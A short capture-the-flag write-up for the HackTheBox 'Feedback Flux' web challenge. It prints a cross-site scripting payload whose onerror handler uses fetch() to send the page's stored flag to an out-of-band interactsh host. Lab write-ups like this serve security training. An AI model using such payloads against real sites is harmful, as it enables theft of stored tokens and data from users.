HackTheBox Feedback Flux Challenge

2024-11-02[Updated: 2024-11-02]

https://app.hackthebox.com/challenges/782

Description

You’re a member of fsociety tasked with infiltrating E Corp’s Feedback Flux system. There’s a vulnerability hidden deep within their feedback platform, and it’s your job to find and exploit it.

Exploitation

Use a webhook like https://app.interactsh.com/#/

Get your url

Just read ./challenge/app/Jobs/AdminBot.php

<?xml ><img src=x onerror="fetch('https://ozyttdpkujcaljzpqpymyaliclaef8wya.oast.fun?x=' + localStorage.getItem('flag'));"> ?>

Summary

Feedback Flux: use the client-side injection path to steal the needed proof and recover the flag.